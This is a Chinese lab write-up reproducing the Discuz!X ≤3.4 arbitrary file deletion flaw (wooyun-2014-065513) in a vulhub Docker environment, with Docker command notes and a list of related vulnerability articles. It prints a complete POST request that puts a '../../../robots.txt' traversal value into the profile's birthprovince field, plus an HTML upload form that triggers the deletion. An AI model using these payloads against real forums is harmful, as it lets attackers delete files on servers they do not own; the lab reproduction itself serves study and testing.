声明

好好学习,天天向上

漏洞描述

Discuz!X社区软件是一个采用PHP 和MySQL 等其他多种数据库构建的性能优异、功能全面、安全稳定的社区论坛平台。

2017年9月29日,Discuz!修复了一个安全问题2用于加强安全性,这个漏洞会导致前台用户可以导致任意删除文件漏洞。

2017年9月29日,知道创宇404 实验室开始应急,经过知道创宇404实验室分析确认,该漏洞于2014年6月被提交到Wooyun漏洞平台,Seebug漏洞平台收录了该漏洞3,漏洞编号ssvid-93588。该漏洞通过配置属性值,导致任意文件删除。

经过分析确认,原有的利用方式已经被修复,添加了对属性的formtype判断,但修复方式不完全导致可以绕过,通过模拟文件上传可以进入其他unlink条件,实现任意文件删除漏洞。

影响范围

  • Discuz!X ≤3.4

复现过程

使用vulhub

这里使用x3.4版本

cd /app/vulhub-master/discuz/x3.4-arbitrary-file-deletion

启动

docker-compose up -d

直接访问IP就行

http://192.168.239.129/

访问后,提示你进行安装

安装时,只用修改数据库地址为db,其他保持默认即可:

[外链图片转存失败,源站可能有防盗链机制,建议将图片保存下来直接上传(img-ses6EjA0-1607170185132)(https://vulhub.org/vulhub/discuz/x3.4-arbitrary-file-deletion/1.png)]

访问http://your-ip/robots.txt可见robots.txt是存在的:

192.168.239.129/robots.txt

[外链图片转存失败,源站可能有防盗链机制,建议将图片保存下来直接上传(img-SAZ9xVmK-1607170185134)(C:\Users\86156\AppData\Roaming\Typora\typora-user-images\image-20201202163813540.png)]

注册一个一般的用户

http://your-ip/member.php?mod=register

访问

http://192.168.239.129/home.php?mod=spacecp&ac=profile&op=base

按F12,ctrf+F查找关键字formhash,查看到值

抓包,发送请求(自行修改Host、Cookie和your formhash)

POST /home.php?mod=spacecp&ac=profile&op=base HTTP/1.1
Host: localhost
Content-Length: 367
Cache-Control: max-age=0
Upgrade-Insecure-Requests: 1
Content-Type: multipart/form-data; boundary=----WebKitFormBoundaryPFvXyxL45f34L12s
User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/61.0.3163.79 Safari/537.36
Accept: text/html,application/xhtml+xml,application/xml;q=0.9,image/webp,image/apng,*/*;q=0.8
Accept-Encoding: gzip, deflate
Accept-Language: zh-CN,zh;q=0.8,en;q=0.6
Cookie: [your cookie]
Connection: close------WebKitFormBoundaryPFvXyxL45f34L12s
Content-Disposition: form-data; name="formhash"your formhash
------WebKitFormBoundaryPFvXyxL45f34L12s
Content-Disposition: form-data; name="birthprovince"../../../robots.txt
------WebKitFormBoundaryPFvXyxL45f34L12s
Content-Disposition: form-data; name="profilesubmit"1
------WebKitFormBoundaryPFvXyxL45f34L12s--

提交成功后,可查看个人资料,生日字段已经被注入脏数据

然后,新建一个upload.html,代码如下,将其中的[your-ip]改成discuz的域名,[form-hash]改成你的formhash:

<body><form action="http://[your-ip]/home.php?mod=spacecp&ac=profile&op=base&profilesubmit=1&formhash=[form-hash]" method="post" enctype="multipart/form-data"><input type="file" name="birthprovince" /><input type="submit" value="upload" /></form>
</body>

保存这个html后,用浏览器打开,让上传一张正常的图片,可是我在我的电脑里面找了好久,都没找到一张正常的图片,无奈自己画了一张,这里有个坑,就是下图

这个原因要么就是你用另外一个浏览器打开了,要么就是你formhash填错了,因为那个xss_check函数就是专门检测formhash的

最后我都用火狐,成功删除robots.txt

使用完关闭镜像(每次用完后关闭)

docker-compose down

docker-compose常用命令

拉镜像(进入到vulhub某个具体目录后)

docker-compose build
docker-compose up -d

镜像查询(查到的第一列就是ID值)

docker ps -a

进入指定镜像里面(根据上一条查出的ID进入)

docker exec -it ID /bin/bash

关闭镜像(每次用完后关闭)

docker-compose down

Discuz!X ≤3.4 任意文件删除漏洞(wooyun-2014-065513)相关推荐

  1. 服务器漏洞文件被删除漏洞,【华中科技大学 - 漏洞预警】Wordpress = 4.9.6 任意文件删除漏洞...

    昨日,互联网上公开了Wordpress <= 4.9.6的任意文件删除漏洞及分析利用材料.该漏洞影响Wordpress全部版本(<= 4.9.6).在攻击者获得基础权限后,可升级角色权限, ...

  2. PHP代码审计——任意文件删除漏洞(YXcms)

    一.代码审计 在我的资源中下载:: YXcms-含有任意文件删除漏洞的源码包 下载即可 删除文件的代码在del()方法,首先通过GET方式接收参数fname传递过来的的值,然后执行in()函数 跟踪i ...

  3. php任意文件删除漏洞,myblog/phpyun4.3任意文件删除漏洞.md at master · source-trace/myblog · GitHub...

    phpyun-expect.class.php任意文件 漏洞信息 公开时间: 2017/08 影响版本: 4.3 利用难度: 2 挖掘难度: 2 漏洞说明 漏洞出现的原因是在于没有对数据进行很好的校验 ...

  4. 【代码审计】任意文件删除漏洞实例

    [代码审计]任意文件删除漏洞实例 任意文件删除漏洞,该漏洞可让攻击者随意删除服务器上的任意文件. 环境搭建: CSCMS :http://www.chshcms.com/ 网站源码版本:Cscms_v ...

  5. 【代码审计】CLTPHP_v5.5.3后台任意文件删除漏洞分析

      0x00 环境准备 CLTPHP官网:http://www.cltphp.com 网站源码版本:CLTPHP内容管理系统5.5.3版本 程序源码下载:https://gitee.com/chich ...

  6. CLTPHP 5.8 后台任意文件删除漏洞

    CLTPHP 5.8 后台任意文件删除漏洞 一.漏洞简介 CLTPHP是基于ThinkPHP5开发,后台采用Layui框架的内容管理系统, 二.漏洞影响 CLTPHP 5.8及之前版本 三.复现过程 ...

  7. php任意文件删除漏洞,phpyun二次任意文件删除漏洞

    ### 简要描述: 只要有任意文件删除 这系统绝对崩. 我吐个槽,最新的过滤文件实在是太BT了,只要有select and .... 就die() 伤不起啊 ### 详细说明: 问题出在 friend ...

  8. php任意文件删除漏洞,phpshe后台任意文件删除漏洞及getshell | CN-SEC 中文网

    摘要 phpshe是一个开源商城程序,程序在前台入库的地方都用了pe_dbhold函数(mysql_real_escape_string,htmlspecialchars过滤),虽然用的是全局变量注册 ...

  9. linux文件删除漏洞,OpenStack Glance v1 API任意文件删除漏洞(CVE-2012-4573)

    发布日期:2012-11-08 更新日期:2012-11-13 受影响系统: openstack Glance Grizzly openstack Glance Essex (2012.1) open ...

  10. linux glance删除命令,OpenStack Glance v2 API任意文件删除漏洞(CVE-2012-5482)

    发布日期:2012-11-08 更新日期:2012-11-13 受影响系统: openstack Glance Grizzly openstack Glance Essex (2012.1) open ...

最新文章

  1. 编程软件python t-Python 3.7 64位下载
  2. MySQL锁的用法之行级锁
  3. POJ - 1091 跳蚤(容斥原理+数论)
  4. ClientDataSet建立索引和排序
  5. 给管道注册事件,用于用户是否登录!
  6. mjorm java_MongoDB 的 ORM框架 MJORM
  7. Java Web中相对路径与绝对路径的分析
  8. linux wait函数头文件_第五十八章、linux中的3种正常结束进程的方式你都了解么...
  9. 关于类型的存储时间和链接
  10. caffe-windows画loss与accuracy曲线
  11. vs C4996的错误解决方法
  12. Java程序员:java软件工程师中级证
  13. 攻防世界misc——flag_universe
  14. 水电缴费系统php源码_水电缴费管理系统(示例代码)
  15. zune自搭虚拟服务器离线升级,Zune 30g 购买/使用 个人经验贴,希望可以帮到有需要的烧友~...
  16. 《极客与团队》一HRT实战
  17. 【python与数据分析】实验八——图像批量添加数字水印及实现模拟转盘抽奖游戏
  18. 小储云方糖消息通知插件配置教程
  19. 九城卷入仙境传说2网游私服风波
  20. wap,WML语言与编程

热门文章

  1. 计算机 随机分组的方法,最小化随机分组方法介绍及其SAS实现
  2. 云基础架构|部署分类|IaaS|PaaS|SaaS——浅析云计算架构
  3. matlab kdj代码,KDJ交易系统原理、用法及源代码(KDJ系统)
  4. boost电路输出电流公式_boost计算公式
  5. 正弦函数的频谱图matlab,怎样用MATLAB画正弦函数以及怎样看频谱图?
  6. springboot报错:Use of @OneToMany or @ManyToMany targeting an unmapped class:
  7. python numpy库数组的存取
  8. Paper 已经过时——计算机时代科学传播方式的变革
  9. 解决缓存和数据库双写数据一致性问题
  10. java a的2次方_java-获取比a大,最接近a的2的次方的数(最小二次幂,位运算)